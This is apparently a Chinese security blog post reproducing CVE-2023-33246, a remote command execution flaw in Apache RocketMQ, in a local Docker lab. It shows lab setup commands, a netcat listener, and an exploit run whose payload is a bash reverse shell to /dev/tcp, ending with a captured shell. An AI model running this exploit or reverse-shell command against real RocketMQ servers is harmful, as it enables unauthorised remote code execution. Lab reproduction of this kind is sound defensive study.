CVE-2023-33246复现
CVE-2023-33246复现
Apache RocketMQ 远程命令执行漏洞
影响范围 Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5
靶场搭建
- 靶场环境安装
1 | docker pull apache/rocketmq:4.9.1 |
- 启动namesrv
1 | docker run -dit -p 9876:9876 -p 10909:10909 --name mqsrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv /bin/bash |
- 启动broker
1 | docker run -dit -p 10908:10908 -p 10911:10911 --name mqbroker --restart=always --link mqsrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /home/rocketmq/rocketmq-4.9.1/conf/broker.conf |
- 启动console
1 | docker run -dit --name mqconsole -p 8080:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=mqsrv:9876 -Drocketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0 |
访问127.0.0.1:8080
EXP复现
https://github.com/SuperZero/CVE-2023-33246
先监听端口
1 | nc -lvnp 1122 |
利用EXP进行反弹shell
1 | java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "bash -i >& /dev/tcp/127.0.0.1/1122 0>&1" |
拿到shell,攻击成功
1 | sh-4.2$ nc -lvnp 1122 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 D3ic1deの世界!
评论